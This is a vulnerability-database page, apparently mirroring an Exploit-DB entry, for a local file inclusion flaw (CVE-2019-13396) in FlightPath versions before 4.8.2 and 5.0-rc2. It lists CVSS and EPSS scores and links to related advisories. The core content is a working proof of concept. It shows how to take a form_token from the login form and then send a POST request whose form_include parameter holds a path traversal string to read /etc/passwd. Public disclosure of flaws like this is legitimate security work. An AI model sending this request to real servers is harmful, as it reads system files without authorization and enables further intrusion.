Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMohammed AlthibyaniEDB-ID:47121
HistoryJul 15, 2019 - 12:00 a.m.

FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion

2019-07-1500:00:00
Mohammed Althibyani
www.exploit-db.com
111

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.4 Medium

AI Score

Confidence

High

0.048 Low

EPSS

Percentile

92.8%

JSON
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396


# Parameters : include_form
# POST Method:

use the login form to get right form_token [ you can use wrong user/pass ]

This is how to POST looks like:

POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login


# modfiy the POST request to be:


POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd




# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.

Related

zdt 1
exploitpack 1
packetstorm 1
nuclei 1
nvd 1
cve 1
prion 1
cvelist 1
zdt
zdt
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion Vulnerability
2019-07-16 00:00:00
exploitpack
exploitpack
FlightPath 4.8.2 5.0-rc2 - Local File Inclusion
2019-07-15 00:00:00
packetstorm
packetstorm
FlightPath Local File Inclusion
2019-07-15 00:00:00
nuclei
nuclei
FlightPath - Local File Inclusion
2022-01-10 23:58:14
nvd
nvd
CVE-2019-13396
2019-07-10 14:15:11
cve
cve
CVE-2019-13396
2019-07-10 14:15:11
prion
prion
Directory traversal
2019-07-10 14:15:00
cvelist
cvelist
CVE-2019-13396
2019-07-10 13:45:05

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.4 Medium

AI Score

Confidence

High

0.048 Low

EPSS

Percentile

92.8%

JSON
Related for EDB-ID:47121
zdt1exploitpack1packetstorm1nuclei1nvd1cve1prion1cvelist1